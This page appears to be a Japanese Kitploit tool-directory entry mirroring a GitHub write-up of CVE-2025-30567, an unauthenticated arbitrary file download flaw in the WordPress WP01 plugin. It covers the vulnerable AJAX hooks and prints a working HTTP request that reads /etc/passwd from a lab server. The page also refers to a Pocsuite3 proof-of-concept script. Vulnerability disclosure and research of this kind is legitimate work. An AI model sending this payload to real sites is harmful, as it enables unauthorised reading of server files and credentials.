Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-30567 — WordPress WP01 における未承認の任意ファイルダウンロード | Kitploit
ツール/GitHubGitHub/oyst3r1ng/cve-2025-30567
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHuboyst3r1ng/cve-2025-30567

CVE-2025-30567

WordPress WP01 における未承認の任意ファイルダウンロード

リポジトリを見る
111年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

はじめに

WordPress WP01 における無許可の任意ファイルダウンロード!

環境設定

ステップ 1: WP01 プラグインをダウンロードしますが…

alt text

はは、心配しないでください。プラグインのソースコードはこちらです。

ステップ 2: 提供された wp01 フォルダをパッケージ化し、WordPress のプラグインセクションにアップロードします。このように→

alt text

分析

単純です — 脆弱性は次の箇所でトリガーされます:

alt text

次に、make_archive メソッドが呼び出されている場所を確認します。

alt text

2つの AJAX アクションフックがあります — ログインユーザー用と非ログインユーザー用です。これが無許可アクセス脆弱性の理由です。

では、ローカルマシンの /etc/passwd の内容を読み取るためのペイロードを作成しましょう。

root@kitploit:~
POST /wp-admin/admin-ajax.php?action=wp01_generate_zip_archive HTTP/1.1
Host: 192.168.43.133
accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: cb_lang=zh-cn; PHPSESSID=8b29e9ec5200189ba7e72e98d4c6d017; WS_ADMIN_URL=ws://192.168.43.133/notice; WS_CHAT_URL=ws://192.168.43.133/msg; wordpress_test_cookie=WP%20Cookie%20check; XDEBUG_SESSION=PHPSTORM; wp01-lang=en; wp_lang=en_US
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

target=passwd&path=/etc/

結果:

alt text

alt text

OK、次に、この wp-01-passwd.zip ファイルをダウンロードします。

alt text

Poc

Pocsuite3 に基づいて書かれています。詳細は Poc_CVE-2025-30567.py を参照してください。

alt text

参考

CVE-2025-30567

ツールをダウンロード